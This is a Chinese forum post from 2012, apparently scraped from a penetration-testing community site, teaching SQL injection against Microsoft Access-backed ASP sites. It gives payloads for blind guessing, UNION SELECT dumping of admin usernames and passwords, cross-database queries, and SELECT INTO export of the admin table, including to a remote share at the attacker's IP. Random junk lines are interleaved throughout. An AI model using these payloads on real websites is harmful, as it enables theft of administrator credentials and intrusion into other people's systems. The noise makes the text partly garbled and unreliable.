中国网络渗透测试联盟
标题:
Access高级注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 14:20
标题:
Access高级注入语句
--------------------------------------------------------------
. W; D, H1 O; c/ e* K) Y
union查询法
4 F* q; L: V# ]2 ]- F
首先要说的就是查询办法,一般的查询办法就是
0 ], ]9 q2 p5 J1 [: i2 x) o
5 l* ?4 b: k4 w! c4 W3 c
程序代码
# y" f' ^& Y' O# B8 v* r
and 1=(select count(*) from admin where left(id,1)='1')
$ Z. m4 c% y8 Y8 y! T& B$ ^5 a
" f2 O* y& @1 j/ c+ I* u1 \) e A
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
5 F5 Q6 T/ |/ E" L2 ^
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
* C1 G: U' J( r" `7 G
譬如你有一个ACCESS点:
( |: S# V7 o( D1 ^0 S
程序代码
3 A5 n- c9 D6 N$ s9 T1 k5 a' ^6 z
http://bbs.tian6.com/xiaoyang.asp?coder=1
1 J8 I3 @3 x- o- N: r
% [8 Y+ ^( l8 x: f1 d& K& v
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
- Z$ G+ @7 A0 o. I- Z) O
然后我们直接来:
7 j3 k" b( a/ X& M9 I0 ]
程序代码
2 L6 u! j! c) c. D( M
http://bbs.tian6.com/xiaoyang.asp?coder=1
union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
1 K' L3 n( [ v" H, B; b1 r# }
# O2 o: d0 u* G2 }" f' `2 T
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
$ L8 L$ u$ O) q* V# t' |9 {
9 y+ x( G( @8 C. q9 N
8 X& v, i, w2 _8 U8 e: U/ l& K
. r; a6 ~5 C! x: [
---------------------------------------------------------------
D0 N3 p2 d% Q3 M2 b* l
Access跨库查询
# ^: ~& v B6 h& d( G% a+ U
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
% k4 |# r' \# ?+ O5 j
跨库的查询语句:
+ }+ q$ a: y0 Q
子查询:
8 {; J% O& B( k- ^# h0 E2 o
程序代码
5 k8 B+ j1 I+ v* s8 h5 x' j
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
: b8 \ u1 |2 G" g, O ~5 }
. v6 V" c! z, H. j
union查询:
) g2 w$ R4 k' r: W* o! B- W V
程序代码
! e% d) ?0 U8 ?: v
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
. q7 f1 W6 D! [/ L9 v0 P
; `- U) J7 O* M9 ~8 }4 Z, M
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
* G# X$ d3 s- a" {
程序代码
# x- F) w4 Y: O! \8 H
http://www.4ngel.net/article/46.htm
4 c1 |3 y) `" {8 ^
http://hf110.com/Article/hack/rqsl/200502/66.html
* x' [9 r6 B) M" y
9 W+ z% x2 G3 G$ D4 d+ N; w" n
---------------------------------------------------------------
: \" e2 I: U: G) h1 Q- F( k
Access注入,导出txt,htm,html
* E% t5 W/ q/ y% W) @
子查询语句:
# ^( W$ j! S, p+ q2 Z+ h
程序代码
. ?& G& ]3 k; N0 y! E2 x$ i- E9 {
Select * into [test.txt] in 'd:\web\' 'text;' from admin
; ~, g6 [7 d/ @6 }% C6 d: B' K; [
4 ]: j# |$ a5 | d+ u$ T
这样就把admin表的内容以test类型存进了d:\web里面.
% X* J3 g; h9 q
UNION查询:
! z9 B; x" R) T
程序代码
& Q* V- i- s2 c
union select * into [admin.txt] in 'c:\' 'test;' from admin
5 ]) G3 J ]" y% M
% h" W7 [& |( r, A Q N8 g
而且这里也可以保存到本地来:
. |) @5 w- i5 Q% s9 e" m2 M
程序代码
$ U/ |" H6 S: r9 P- M2 l
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
" y' A( W# `5 h2 x; V$ h
/ t9 _* ^& S. [2 S/ F: M# r
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
. ^) U" B) O4 {7 n( g9 O, v& K
: v! O+ j# n; ]3 ^) X8 t
程序代码
! L: c5 c7 L% M% q* x5 @
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
3 f- d8 e: m% [; k3 }, ^
8 R5 o# i: u! L# _6 ~; T& n
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
7 l( Q. I& t5 D6 @: U! V
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2